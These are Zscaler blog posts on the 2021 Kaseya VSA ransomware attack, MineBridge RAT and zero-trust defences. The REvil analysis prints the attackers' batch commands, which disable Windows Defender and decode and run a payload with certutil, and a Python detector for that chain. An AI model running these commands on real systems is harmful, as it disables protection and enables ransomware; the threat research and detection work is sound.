In many ways, mergers and acquisitions (M&As) are a part of daily life in the pharmaceutical industry. They accelerate research and development and lead to rapid results within the industry. However, what at first glance seems to be an administrative and organisational task often turns out to be a real feat of strength for IT departments. Zero trust architectures introduce speed and security into M&A processes.
The pharmaceutical industry lives off continuous innovation and speedy research results. This is where time to market plays a particularly important role: partnerships and takeovers are often the method of choice to gain the upper hand in global competition with clinics, laboratories, and research centres. However, company takeovers generally go hand in hand with a myriad of challenges associated with the IT infrastructure. Systems and data must be aligned, streamlined, and consolidated. The same applies to the network of the newly structured organisation: IP addresses and DNS hosts no longer match, port forwarding leads nowhere, and Network Address Translation (NAT) fails. In addition, merging networks can create new weak points and security gaps, and compliance issues can crop up or be created. In summary, mergers and acquisitions are hard work for IT. Moreover, they cost time and money for equipment and personnel.

Fast and secure

Speed and security are concerns that shouldn't be an issue nowadays. As with many other industries, the cloud has the perfect solution for the pharmaceutical sector: a plan based on a software-defined perimeter (SDP) not only simplifies the merging of various IT topologies, it also reduces the attack surface in a newly merged and large organisation. Basically, instead of placing users on the on-premises network in their own data centres, network access based on zero trust allows fast and secure access for users through the cloud, without tediously merging two networks. This means that an SDP approach, such as Zscaler's zero trust network access (ZTNA) solution, Zscaler Private Access, replaces the on-premises network architecture and provides additional benefits from the cloud. ZTNA provides a secure connection between users and applications.
Following a prior policy-based authorisation, users are granted secure access to the application they want through a cloud security platform. A direct, outbound tunnel from the application to the user is created by means of a cloud connector. The application itself remains invisible to external parties. ZTNA endorses the principle of least privilege, meaning that specific users are only granted the precise access rights needed to do the tasks associated with their job. Implementing ZTNA in M&A processes means that individual access can be clearly defined for both companies. Therefore, the organisation that has been acquired never has access to the entire network. For example, employees in the personnel department only have access to HR-relevant apps, the finance department can only access financial data, and research and development can view formulae only once they have been authorised to do so. In other words, the internet becomes a secure company network on which company applications remain hidden from unauthorised users.

A principle that satisfies everyone: the company's management team can avoid the high costs of network consolidation and optimisation due to M&A. Meanwhile, system administrators can retain oversight of user data traffic in real time, because migration takes weeks instead of months.

Additional resources:
Blog: How ZTNA Speeds Time to Value
Video: Introduction to Zero Trust Network Access

Fri, 16 Jul 2021 08:00:02 -0700 Nils Ullmann

ThreatLabZ June 2021 Report: Deconstructing Kaseya Supply-Chain Attack and the Minebridge RAT Campaign

This post also appeared on the CXO REvolutionaries site. Read more here.

With the petabytes of daily data transactions it secures, the Zscaler ThreatLabZ security research team has a unique view of the latest cybersecurity trends and, more importantly, threat activity. This month, we deconstructed the new Kaseya VSA supply-chain attack and took a deep dive into the Minebridge RAT infection chain.
The REvil hackers come back with a Kaseya supply-chain ransomware attack

On July 2, 2021, Kaseya, an IT management software firm, disclosed a security incident impacting the on-premises version of Kaseya's Virtual System Administrator (VSA) software. Kaseya VSA is a cloud-based Managed Service Provider (MSP) platform that allows service providers to perform patch management, backups, and client monitoring for their customers. As soon as the incident became known, the ThreatLabZ team reported on the attack and deconstructed the attack payload.

Per Kaseya, the attack didn't impact the majority of customers that rely on Software-as-a-Service (SaaS) offerings. Only a small percentage (about 50 worldwide) running on-premise instances of the Kaseya VSA server were affected. However, the attack did propagate to more than 1,000 organizations downstream. Based on the most recent information, the REvil gang exploited a zero-day vulnerability in the Kaseya VSA server to compromise on-prem versions of VSA Server and then distributed REvil ransomware to target systems belonging to several downstream organizations.

The threat actor behind this attack used the compromised Kaseya VSA server to send a malicious script to all clients managed by that VSA server. The script disables some features of Windows Defender and then installs ransomware.

Figure 1: Kaseya ransomware attack batch script

This variant of REvil (aka Sodinokibi) ransomware uses several techniques to evade security products, including a custom packer. The REvil payload is distributed as a portable executable (PE) with a modified header.

One of the key lessons from both the SolarWinds Orion and Kaseya VSA supply-chain attacks is that it is vital for organizations to restrict external access to and from these critical IT management assets. Even with trusted tools and partners, organizations must build controls around identity and zero trust policies that securely connect users directly to applications and never to networks.
With Zero Trust, you can fundamentally eliminate the attack surface by making critical enterprise resources invisible to adversaries and impossible to attack. It is important to note that details from this incident are still emerging, and we will update our coverage advisory with more analysis as they become available.

Demystifying the full attack chain of MineBridge RAT

In March 2021, we saw threat actors start distributing MineBridge RAT with an updated distribution mechanism. The attack involved a remote access trojan (RAT) that exploits an older vulnerable version of TeamViewer for DLL side-loading, enabling the threat actor to take a wide array of remote follow-on actions. These actions include things such as spying on users or deploying additional malware. In May 2021, Zscaler ThreatLabz uncovered all the components of this complex multi-stage attack chain. This is a first: the entire attack chain had not been publicly documented in its entirety before this.

Figure 2: Complete end-to-end attack chain used to deliver MineBridge RAT

We discovered that the threat actors are now distributing MineBridge RAT through Windows Installer binaries masquerading as trading applications. The different stages in this sophisticated attack chain leverage Windows scheduled tasks, PowerShell scripts, reverse SSH tunnels, legitimate binaries such as TeamViewer, and shortened URLs that ultimately lead to the execution of MineBridge RAT. The Minebridge RAT threat actors registered the domain "tradingview[.]cyou," a look-alike of the legitimate website "tradingview[.]com." A download link for the malicious TradingView Desktop application was placed on the homepage. The official TradingView desktop application was launched for the first time in December 2020, indicating how quickly the threat actor identifies new opportunities to exploit users.
Within four months of the legitimate launch of the new official trading application, the threat actor was ready and able to distribute the malicious version of the application to snare unsuspecting traders. Our ThreatLabZ team has a complete technical breakdown of the Minebridge RAT attack in our blog.

Zscaler Zero Trust Exchange Coverage: Advanced Threat Protection, SSL Inspection, Advanced Cloud Sandbox.

Zscaler Zero Trust Exchange

Zscaler manages the world's largest security cloud. Each day, Zscaler blocks more than 150 million threats to its 4000+ customers. Over the last six months, Zscaler monitored and secured over one trillion cloud application transactions. The Zscaler ThreatLabZ security research team uses state-of-the-art AI and machine-learning technology to analyze Zscaler Zero Trust Exchange traffic and share its findings.

Mon, 12 Jul 2021 08:07:53 -0700 Deepen Desai

Stop the Next Kaseya Attack

Watch the on-demand replay of the July 13th ThreatLabz webinar for a deep dive into the Kaseya attack and how to defend against it.

While Americans were prepping for their long Fourth of July weekends, cybercriminals were preparing a widespread ransomware attack on businesses around the world using a vulnerability in the Kaseya VSA remote monitoring and management tool. The attack targeted on-premises instances of the Kaseya VSA server, which allows managed service providers (MSPs) to perform patch management, backups, and client monitoring for their customers. Attackers exploited a zero-day vulnerability in the VSA server software in order to distribute REvil ransomware to between 40 and 60 MSPs and, subsequently, the customers of those MSPs: over 1,000 in total. This mode of proliferation is called a "supply chain" attack; it uses the trusted access of an IT tool to gain access to many more organizations' networks, allowing attackers to multiply their damage many times over.
Kaseya, just like SolarWinds, which was exploited in a different supply chain attack earlier this year, is a long-standing and well-regarded IT management solution. The successful attacks on these services prove that any partner with access to your IT environment can quickly become a vulnerability.

Zero Trust is the answer

It is critical that you adopt zero trust strategies in order to mitigate business risk from these attacks. There should be no such thing as a trusted partner, a trusted employee, or a trusted device. Access to resources should be granted on a dynamically controlled, least-privilege basis. Even with trusted tools and partners, organizations must assume that every connection could be a potential attack, and build controls around identity and zero trust policies that securely connect users directly to applications, and never to networks. With Zero Trust, you can fundamentally eliminate the attack surface by making enterprise resources invisible to adversaries and impossible to attack, unlike traditional network security approaches that leave the front door open to threats from trusted sources.

Every attack has a series of steps required to succeed, often referred to as the "kill chain" or "attack lifecycle." Below, we break down the steps of a typical REvil ransomware attack as outlined in the ThreatLabz Ransomware Review, and discuss how Zero Trust can stop them:

Prevent compromise

The first thing attackers have to do is compromise your network, then download and execute malicious payloads. REvil has been known to gain entry through phishing emails, exploit kits, and compromised RDP accounts, and also frequently exploits vulnerabilities in Oracle WebLogic. Many attackers sneak in through encrypted channels, as was likely the case in the Kaseya attack: ThreatLabz found a 500% increase in SSL-delivered malware year-over-year in its latest State of Encrypted Attacks report.
To prevent this kind of compromise in alignment with the principles of Zero Trust, organizations must:

- Have full visibility with full inspection of all traffic, whether encrypted or not, to stop malicious downloads, whether through emails, websites, or other channels.
- Minimize the attack surface. Applications should not be published to the internet to be brute forced or exploited; instead, they should only be accessible through an exchange after proper authentication.
- Detect and stop malicious activity by keeping security tools up to date and using AI-powered detection to discover never-before-seen ransomware variants and analyze behaviors. In-line sandboxing and browser isolation capabilities should be deployed to help identify and stop advanced unknown threats.
- Control access with strict least-privilege policies that are monitored and addressed for gaps in entitlements, policy, compliance, and configurations.

Kaseya has announced that it is rolling out enhancements to its own security to prevent future compromise, including better sandboxing, isolation, and web application firewalls, all important components of the Zscaler Zero Trust Exchange.

Prevent lateral movement

While it does not appear to have been the case in the Kaseya supply-chain ransomware attack, once an attacker is in your network, they often move laterally to scan your network and find valuable data, which they commonly steal and encrypt in a ransomware attack. To prevent this, organizations should:

- Segment applications: Microsegmentation is an important cornerstone of zero trust; it limits access to mitigate damage under the assumption that you have already been breached. Use a proxy architecture to connect users and workloads directly to the application or resource that they need, never the network. If an attacker should breach a single application, the damage they can cause stops there.
- Get proactive with active defense: A less common but extremely effective defense tactic is using active defense or "deception" technologies to identify and stop lateral movement attempts. These tools deploy decoy apps and lures that act as tripwires for attackers, diverting them from the assets they are actually after while giving your security team high-fidelity alerts that an attack is underway.

Prevent data theft

About 50% of REvil attacks (along with many other ransomware families) involve attackers stealing data and threatening to publish it, known as "double extortion." This gives attackers a lot of leverage when making their demands, as organizations have to worry about more than just restoring their data. To ensure that your data stays protected, Zero Trust best practices dictate that you should:

- Inspect all northbound traffic. Safeguard sensitive data with granular DLP controls that identify and block data leakage or theft across all inline and SSL traffic in real time.
- Set policies to only allow communication with known-good destinations: In the case of SolarWinds, attackers took advantage of lax policies that allowed the software to communicate with unknown destinations, which ended up including the DarkSide command-and-control servers. No matter how good your technology is, "default deny" is a critical concept in Zero Trust; you should only allow communications that are required for the tool to function properly.
- Shield your cloud apps from exposure: Use cloud access security brokers (CASB) to enforce granular controls over sanctioned and unsanctioned cloud apps, while securing sensitive data at rest from theft or accidental exposure.
- Address cloud misconfigurations: Prevent cloud breaches and data loss by identifying and closing dangerous misconfigurations in SaaS and public clouds.
Ransomware and supply chain attacks will surely get worse before they get better: Cybersecurity Ventures has estimated that cybercrime will cost organizations $6 trillion globally in 2021, and up to $10.5 trillion in 2025. By embracing Zero Trust, security teams can minimize the chances that they will be victimized by these attacks as well as the potential damage that attackers can cause.

For more discussion, watch the on-demand replay of our July 13th webinar in which Zscaler CISO Deepen Desai and Research Director Amit Banker discuss the Kaseya attack. To learn more about REvil and other ransomware trends, download a free copy of our report, ThreatLabz Ransomware Review: The Advent of Double Extortion.

Wed, 07 Jul 2021 11:16:16 -0700 Mark Brozek

Kaseya Supply Chain Ransomware Attack - Technical Analysis of the REvil Payload

On July 2, 2021, Kaseya, an IT management software firm, disclosed a security incident impacting the on-premises version of Kaseya's Virtual System Administrator (VSA) software. Kaseya VSA is a cloud-based Managed Service Provider (MSP) platform that allows service providers to perform patch management, backups, and client monitoring for their customers. Per Kaseya, the majority of their customers that rely on Software-as-a-Service (SaaS) based offerings were not impacted by this issue; only a small percentage (less than 40 worldwide) running on-premise instances of the Kaseya VSA server were affected, though it is believed that 1,000+ organizations were impacted downstream. Below is the ThreatLabz technical deep-dive on the attack. For more background, read our full coverage blog here.

Infection Overview

The threat actor behind this attack identified and exploited a zero-day vulnerability in the Kaseya VSA server. The compromised Kaseya VSA server was used to send a malicious script to all clients that were managed by that VSA server. The script was used to deliver REvil ransomware, which encrypts files on the affected systems.
The malicious script contained the following Windows batch commands:

    C:\windows\system32\cmd.exe /c ping -n 7615 > nul
      & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe
      & echo %RANDOM% >> C:\Windows\cert.exe
      & C:\Windows\cert.exe -decode c:\kworking1\agent.crt c:\kworking1\agent.exe
      & del /q /f c:\kworking1\agent.crt C:\Windows\cert.exe
      & c:\kworking1\agent.exe

The PowerShell command in the commands above disables some features of Windows Defender, such as real-time protection, network protection, scanning of downloaded files, sharing of threat information with the Microsoft Active Protection Service (MAPS), and automatic sample submission. A renamed copy of certutil.exe is used to decode the Base64-encoded payload located in agent.crt and write the result to an executable file named agent.exe in Kaseya's working directory. The Windows batch script then executes the agent.exe file, which creates and launches the REvil ransomware payload.

REvil/Sodinokibi Ransomware

The executable agent.exe is digitally signed with a valid digital signature with the following signer information:

Name: PB03 TRANSPORT LTD.
Email:
Issuer: CN = Sectigo RSA Code Signing CA, O = Sectigo Limited, L = Salford, S = Greater Manchester, C = GB
Thumbprint: 11FF68DA43F0931E22002F1461136C662E623366
Serial Number: 11 9A CE AD 66 8B AD 57 A4 8B 4F 42 F2 94 F8 F0

Upon execution, the file agent.exe drops two additional files, which are present in its resource section with the names SOFTIS and MODLIS. These two files are written to the C:\Windows directory.
If the malware is unable to write to this location (e.g., due to insufficient permissions), these files are instead dropped in the Windows %temp% directory. The two files are:

MsMpEng.exe - A legitimate Windows Defender executable that is vulnerable to DLL side-loading.
mpsvc.dll - The REvil ransomware DLL.

The executable file agent.exe then executes MsMpEng.exe, which is vulnerable to a DLL side-loading attack, to load the REvil ransomware DLL file mpsvc.dll located in the same directory. As a result of the vulnerability, the Windows Defender executable loads the REvil DLL into its own context, as shown in Figure 1.

Figure 1. Main function of the malicious executable used in the Kaseya attack that drops a vulnerable copy of Windows Defender to load REvil ransomware.

This variant of REvil (aka Sodinokibi) ransomware uses several techniques to evade security products. This includes the use of a custom packer, with the REvil payload distributed as a portable executable (PE) with a modified header, as shown in Figure 2 (where the original PE header is shown on the left and the modified header on the right). This is likely designed to evade security products that are not able to properly handle PE files that have been modified.

Figure 2. Modified REvil PE header (the original header is shown on the left, while the Kaseya REvil payload is shown on the right).

The malware binary has an embedded encrypted configuration, which is decrypted using RC4 at runtime, as shown in Figure 3.

Figure 3. RC4 decryption of REvil configuration.

The REvil ransomware configuration contains specific settings for the malware. The configuration is stored in JSON format with the configuration parameters shown in Table 1.
Configuration Key  Description
arn                Establish persistence via an autorun registry value
dbg                Enable debug mode
dmn                Semicolon-separated list of potential C&C domains
et                 Encryption type (partial or full)
exp                Attempt to elevate privileges by exploiting a local privilege escalation (LPE) vulnerability
img                Base64-encoded ransom wallpaper
nbody              Base64-encoded ransom note
net                Send beacons to the REvil command and control server
nname              File name of the ransom note dropped in folders where files were encrypted
pid                Unique ID to identify this attack
pk                 Base64-encoded value of the attacker's public key used to encrypt files
prc                List of processes to kill
rdmcnt             Readme count (always set to 0)
sub                Possible campaign/affiliate ID or just a sub-version number
svc                List of services to stop
wfld               Directories to wipe
wht                List of whitelisted extensions, folder names and file names
wipe               Wipe the specified directories

Table 1. REvil configuration keys and their purpose.

The full decrypted configuration for this REvil attack can be found here.

This variant of REvil has the key net assigned the value false, which instructs the ransomware not to beacon information back to the C&C domains after encryption. This is likely to evade network-based signatures that could potentially alert victims to an ongoing attack. The REvil configuration in the Kaseya attack also disables persistence through the arn configuration parameter, which may likewise be designed to evade early-stage detection.

Before the encryption process, the registry key HKEY_LOCAL_MACHINE\SOFTWARE\BlackLivesMatter is created to store the victim's and attacker's encryption key information and the file extension to be appended, as shown in Figure 4 below.

Figure 4. Registry key names and values created by REvil ransomware.

The registry key values are described below in Table 2.
Registry Value Name  Description
96Ia6                Victim's secret key encrypted with the attacker's public key ("pk")
Ed7                  Attacker's public key
JmfOBvhb             Encrypted victim's key (same as the key present in the ransom note)
QIeQ                 Victim's public key
Ucr1RB               Victim's secret key encrypted with the master public key
wJWsTYE              Extension to be appended after encryption

Table 2. REvil registry key values.

REvil changes the Windows firewall settings to allow the local system to be discovered on the local network by other computers, using the command:

    netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes

File Encryption Process

REvil ransomware encrypts all files that are not covered by the whitelisted file names and extensions stored in the configuration. REvil reads each file, encrypts the contents, and writes the result back to the original file to prevent file recovery. After the encryption, a footer is written to the end of the file and the encrypted file is renamed with an appended file extension.

REvil ransomware uses a combination of Curve25519 (asymmetric) and Salsa20 (symmetric) encryption algorithms to encrypt files on the system. The Salsa20 encryption key is derived from the victim's public key and the secret key of the key pair generated for each file. To decrypt a file, the victim's secret key and the file's public key must be known.

The ransomware writes a footer with a size of 232 (0xE8) bytes at the end of every encrypted file. The footer metadata contains the information shown below in Table 3.
Parameter              Data size  Description
attacker_public_key    0x58       Victim's secret key encrypted with the attacker's public key
master_public_key      0x58       Victim's secret key encrypted with a master public key
file_public_key        0x20       Public key generated for each file
salsa20_nonce          0x8        Salsa20 nonce
crc32_file_public_key  0x4        CRC32 checksum of file_public_key
et_config              0x4        Encryption type (0 in this case)
sk_size                0x4        Bytes to skip during encryption
null_encrypted         0x4        NULL value encrypted with Salsa20

Table 3. REvil footer added to encrypted files.

An example REvil footer is shown below in Figure 5, with the corresponding fields highlighted.

Figure 5. Footer metadata appended to a file encrypted by REvil.

After the encryption, REvil drops a ransom note named {random alphanumeric characters}-readme.txt based on the rdmcnt configuration (in this case, rdmcnt is set to zero, so REvil drops a ransom note in every directory). The ransomware then writes the content of the img configuration value to a file in the Windows %temp% directory and sets this file as the wallpaper on the infected system. Figure 6 displays a screenshot of the REvil ransom note and wallpaper after the file encryption is completed.

Figure 6: REvil ransom note and wallpaper after file encryption.

The authors of REvil ransomware have posted attack details on their leak website, as shown in Figure 7. The group is currently demanding $70 million worth of Bitcoin for a master decryption tool.

Figure 7. REvil's Kaseya attack post on their dark web leak site.

Indicators of Compromise (IOCs)

The following IOCs can be used to detect REvil infections used in the Kaseya attack.
Hash                                                              Type    Description
95f0a946cd6881dd5953e6db4dfb0cb9                                  MD5     agent.crt (encoded REvil dropper)
561cffbaba71a6e8cc1cdceda990ead4                                  MD5     agent.exe (REvil dropper)
a47cf00aedf769d60d58bfe00c0b5421                                  MD5     mpsvc.dll (REvil ransomware)
7ea501911850a077cf0f9fe6a7518859                                  MD5     mpsvc.dll (REvil ransomware)
2093c195b6c1fd6ab9e1110c13096c5fe130b75a84a27748007ae52d9e951643  SHA256  agent.crt (encoded REvil dropper)
d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e  SHA256  agent.exe (REvil dropper)
8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd  SHA256  mpsvc.dll (REvil ransomware)
e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2  SHA256  mpsvc.dll (REvil ransomware)

The full list of 1200+ hardcoded beacon domains related to this REvil variant can be found here.

Tue, 06 Jul 2021 13:37:03 -0700 Mohd Sadique

Coverage Advisory for Kaseya VSA Supply-Chain Ransomware Attack

Background

On July 2, 2021, Kaseya, an IT management software firm, disclosed a security incident impacting the on-prem version of the Kaseya VSA software. Kaseya VSA is a cloud-based MSP platform that allows service providers to perform patch management, backups, and client monitoring for their customers. As per Kaseya, the majority of their customers that rely on the SaaS-based offering were not impacted by this issue, and only a small percentage (less than 40 worldwide) running on-prem instances of the Kaseya VSA server were affected.

Zscaler ThreatLabz is actively tracking the Kaseya VSA supply-chain ransomware attack incident, involving REvil/Sodinokibi ransomware targeting a number of Managed Service Providers (MSPs) and encrypting data for 1000+ businesses they manage.
To minimize the adverse impact, Kaseya has shut down all SaaS server instances of VSA remote monitoring as a precautionary measure, although the impact has only been observed in the on-prem version of the VSA servers, and it has notified all customers to shut down on-prem VSA server instances until they are explicitly told to bring them back. According to Kaseya, it has identified the vulnerability that was possibly exploited to compromise the VSA server and will soon release a patch.
What is the issue?
The investigation into this security incident is still in progress and more details are emerging regularly. Based on the information available so far, it appears that a zero-day vulnerability in the VSA server software was potentially exploited to plant a custom malware loader and eventually distribute REvil ransomware to target systems. The compromised VSA deployment drops a .crt file to a specific path under C:\, which is believed to be distributed through updates from the VSA server; in this case, it was reportedly distributed as 'Kaseya VSA Agent Hot-fix.' A PowerShell command then disables various Microsoft Defender security measures before decoding the .crt file using the legitimate Windows certutil.exe command. The extracted file is saved as agent.exe in the same folder and is responsible for encrypting data on the victim machine. The attacker leverages the DLL side-loading technique, using an older version of a legitimate Microsoft Defender executable to launch the malicious REvil DLL on victim machines.
What can you do to protect yourself?
Shut down all instances of on-prem VSA servers, if you haven't already, until further communication from Kaseya. While details of this incident are still surfacing and we will update this advisory further, the following are some best practices for safeguarding against and limiting the impact of supply-chain attacks.
- Route all server traffic through Zscaler Internet Access, which provides the visibility needed to identify and stop malicious activity from compromised systems and servers.
- Restrict traffic from critical infrastructure to an allow list of known-good destinations.
- Ensure you are inspecting all SSL traffic.
- Turn on Advanced Threat Protection to block all known command-and-control domains.
- Extend command-and-control protection to all ports and protocols with the Advanced Cloud Firewall (Cloud IPS module), including emerging C2 destinations.
- Use Advanced Cloud Sandbox to prevent unknown malware delivered as part of a second-stage payload.
- Limit the impact of a potential compromise by restricting lateral movement with identity-based micro-segmentation (Zscaler Workload Segmentation) and a Zero Trust architecture.
- Safeguard crown-jewel applications by limiting lateral movement using Zscaler Private Access.
Zscaler coverage
Zscaler leveraged the published countermeasure details to ensure coverage against this variant of REvil/Sodinokibi ransomware. Enhanced protection has been added wherever necessary across multiple layers of the Zscaler security platform. Below are the threat names of the existing detections:
Advanced Threat Protection
Win32.Ransom.REvil
Win32.Ransom.Sodinokibi
Win32.Ransom.Revil.LZ
Malware Protection
W32/Agent.DCD.gen!Eldorado
Win32_Ransom_Gen_120472
Win32_Ransom_Sodinokibi_120054
W32/Trojan.CTZP-7180
W32/Trojan.NUKQ-0017
W32/Trojan.OSEZ-5971
W32/Trojan.QYHK-7170
W32/Trojan.UAOH-3259
TR/Ransom.Sodinokibi.ufzkr
Details related to these threat signatures can be found in the Zscaler Threat Library.
Advanced Cloud Sandbox
We have ensured that Zscaler Cloud Sandbox flags these Indicators of Compromise (IOCs). As always, Cloud Sandbox plays a critical role in blocking newer variants of ransomware payloads and providing protection against patient-zero infection.
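Endpoint telemetry can be checked for the execution chain the advisory describes (Defender tampering, certutil decoding a .crt under C:\, agent.exe running from the same folder, and a Defender binary side-loading mpsvc.dll); the following is an added example, not Zscaler's code. It assumes the Defender tampering uses Set-MpPreference and that the legitimate Defender executable is MsMpEng.exe, uses a made-up drop folder because the advisory names none, and feeds the rules constructed events shaped like Sysmon process-creation and image-load records.

```python
import re
from typing import Dict, List, Tuple

# Directories where a genuine Microsoft Defender engine binary normally lives
# (assumed, not stated on the page); anything else is a side-loading candidate.
DEFENDER_DIRS = (
    r"c:\program files\windows defender",
    r"c:\programdata\microsoft\windows defender\platform",
)

Event = Dict[str, str]
Alert = Tuple[str, str, str]  # (rule name, offending path, context)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _dirname(path: str) -> str:
    return path.rsplit("\\", 1)[0].lower()


def analyze(events: List[Event]) -> List[Alert]:
    """Apply the stages of the chain to a sequence of endpoint events.

    Each event carries "Type" ("Process" or "ImageLoad"), "Image", and either
    "CommandLine" or "ImageLoaded", loosely modelled on Sysmon events 1 and 7.
    """
    alerts: List[Alert] = []
    decoded_dirs = set()  # folders where certutil wrote a decoded .crt payload
    for ev in events:
        image, base = ev["Image"], _basename(ev["Image"])
        if ev["Type"] == "ImageLoad":
            dll = ev["ImageLoaded"]
            # mpsvc.dll is the side-loaded REvil payload; a copy loaded from
            # outside the Defender install path is the side-loading indicator.
            if _basename(dll) == "mpsvc.dll" and not _dirname(dll).startswith(DEFENDER_DIRS):
                alerts.append(("mpsvc_dll_outside_defender_path", dll, image))
            continue
        cmd = ev["CommandLine"]
        # 1. PowerShell turning off Defender protections (assumes Set-MpPreference).
        if base in ("powershell.exe", "pwsh.exe") and re.search(
                r"set-mppreference\s+-disable\w+\s+\$?true", cmd, re.I):
            alerts.append(("defender_tampering", image, cmd))
        # 2. certutil used to decode a .crt file stored under a drive root path.
        if base == "certutil.exe":
            m = re.search(r"-decode\s+\"?([a-z]:\\[^\s\"]+\.crt)", cmd, re.I)
            if m:
                decoded_dirs.add(_dirname(m.group(1)))
                alerts.append(("certutil_decode_crt", m.group(1), cmd))
        # 3. agent.exe executing from the same folder the .crt was decoded in.
        if base == "agent.exe" and _dirname(image) in decoded_dirs:
            alerts.append(("dropper_from_decoded_crt", image, cmd))
        # 4. A Defender engine binary running from a non-standard location.
        if base == "msmpeng.exe" and not _dirname(image).startswith(DEFENDER_DIRS):
            alerts.append(("defender_binary_outside_install_path", image, cmd))
    return alerts


def sample_events() -> List[Event]:
    """Constructed events reproducing the chain; placeholder_dir stands in for
    the real drop folder, which the advisory does not name."""
    d = r"C:\placeholder_dir"
    return [
        {"Type": "Process", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "CommandLine": "powershell.exe -c Set-MpPreference -DisableRealtimeMonitoring $true"},
        {"Type": "Process", "Image": r"C:\Windows\System32\certutil.exe",
         "CommandLine": f"certutil -decode {d}\\agent.crt {d}\\agent.exe"},
        {"Type": "Process", "Image": f"{d}\\agent.exe", "CommandLine": f"{d}\\agent.exe"},
        {"Type": "Process", "Image": f"{d}\\MsMpEng.exe", "CommandLine": f"{d}\\MsMpEng.exe"},
        {"Type": "ImageLoad", "Image": f"{d}\\MsMpEng.exe", "ImageLoaded": f"{d}\\mpsvc.dll"},
        # Benign activity that must not fire: a real Defender engine and a hash check.
        {"Type": "Process", "Image": r"C:\Program Files\Windows Defender\MsMpEng.exe",
         "CommandLine": r"C:\Program Files\Windows Defender\MsMpEng.exe"},
        {"Type": "Process", "Image": r"C:\Windows\System32\certutil.exe",
         "CommandLine": r"certutil -hashfile C:\Windows\notepad.exe SHA256"},
    ]


if __name__ == "__main__":
    for rule, path, context in analyze(sample_events()):
        print(f"{rule}: {path}  <- {context}")
```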
Fig: Zscaler sandbox report for the REvil sample involved in the Kaseya supply-chain attack
The Zscaler ThreatLabz team is actively monitoring this campaign and any activity around REvil/Sodinokibi ransomware to ensure coverage for newer IOCs as they are discovered. The detailed technical analysis of the REvil payload used in the Kaseya VSA server supply-chain ransomware attack can be found here.
Sun, 04 Jul 2021 15:42:54 -0700 Rohit Hegde
Cybersecurity, Governance, and the Implications of Oversight: How your Board of Directors Could be at Risk
Read more posts like this on Zscaler's CXO REvolutionaries.
Our increasingly entrenched and extensive use of technology in nearly every facet of life urgently calls for security solutions that keep our networks and data safe. While some companies are keeping pace, many are still working to upgrade their infrastructure and can miss key gaps in cybersecurity. The latest spate of ransomware attacks across large enterprises with deep pockets and public agencies suggests that no one is immune. And this is not the time to make an error. In 2020 alone, data breaches due to ransomware attacks carried an average price tag of $4.4 million. This number does not include the impact of ransomware, destructive malware, or hijacked logins and identities.
Firms scrambling to ward off attacks from tech-savvy and tactical hackers are driving a booming investment in cybersecurity consulting and solutions. The market is expected to reach $418 billion by 2028. The increase in cybersecurity spending is a reaction to the increase in cyberattacks: in the last year, 43% of businesses were targeted. And data isn't the only thing on the line.
[Chart: 2020 Deloitte Cyber Survey, Cyber Security Leadership: “How has the cyberthreat against your organization in your view developed?”]
What is truly at risk with cybersecurity?
The threat of data corruption and privacy infractions grows with each passing day.
The increased reliance on remote and hybrid work only expedited the damage from security flaws previously exploited on cloud systems and open networks. Companies implementing 5G networks or leveraging the Internet of Things (IoT) stand to lose much if they succumb to a cyberattack. But by no means should corporations halt progress due to security fears. And they aren't: nearly 80% of companies are rolling out new tech innovation without the means to secure it, and a system breach brings a breach of trust with customers and stakeholders. The result is almost always the same: business operations are disrupted, data is lost or stolen, and the bottom line suffers.
Who is truly responsible for cybersecurity infractions?
Gone are the days of pushing off technical problems to IT teams. Technology is the core of most modern business enterprises, and that reliance only becomes more pronounced as time goes on. While we need knowledgeable IT teams in place to implement, monitor, and maintain these systems, the responsibility for their purchase and efficacy falls largely on management. This does not exempt publicly traded companies with board-of-directors oversight. In fact, as was the case with Target and Equifax, leadership has had to take responsibility for data breaches and their repercussions. The Target legal settlement required the implementation of a security program, an independent security assessment, and executive responsibility moving forward. While the Business Judgment Rule provides comprehensive protections, the courts have considered personal liability for improper security measures and for the failure of board members or directors to take reasonable action and responsibility for preventing what are often considered preventable situations. And the penalties can be steep and damaging. On top of data loss and a detrimental economic toll on the company, litigation and change management can be costly and time consuming.
Cybersecurity regulators, such as the Office of the Comptroller of the Currency, are also imposing fines on a massive financial scale for infractions.
How to address cybersecurity governance
With risk management cascading from directors down to implementation teams, staying informed and being proactive is critical. But how can a board of directors, which is most likely not composed of cybersecurity experts, approach cybercrime risk mitigation from a leadership perspective? In one survey of enterprises, only slightly more than a third of respondents reported reviewing security concerns at least monthly.
[Chart: 2020 Deloitte Cyber Survey, Cyber Security Leadership: “How often is cybersecurity on the top leadership's agenda?”]
Proactive demonstration of due diligence is a great starting point. Tapping into experts and (somewhat ironically) technology solutions to fill knowledge gaps is another. PwC recommends that boards explore the benefits of the NIST CSF to foster effective communication and processes among all stakeholders. Here, we'll explore a few ways directors can seek and achieve better cybersecurity governance for their organizations. The key is to approach this largely like other content areas where directors may not be specific thought leaders. Education, information, and dissemination can counter previously inadequate, hands-off, and even lackluster efforts.
Realize the bigger picture
You can't know what you don't know. A board of directors should start by reviewing reports from IT leaders and stakeholders in the organization. Bring in the experts and ask for a complete assessment of known gaps as well as evolving changes in your tech stack. You may need to design or implement additional reporting to ensure that your understanding is formed on a data- and fact-based level. From there, you can use the information to gain better knowledge of challenges, achievements, and recommended actions for improved cybersecurity policies moving forward.
Assign security oversight responsibility
Someone on the board (either a single member or a committee) should be assigned responsibility for learning the ins and outs of the company's security needs and status. These individuals can provide ongoing updates and present larger issues for the broader board to assess and vote on. Committee members don't have to be experts, but they can evolve into specialists. They can rely on internal specialists, third-party consultants, vendors, and technology solutions to plan ahead and better understand the landscape.
Leverage objective measures
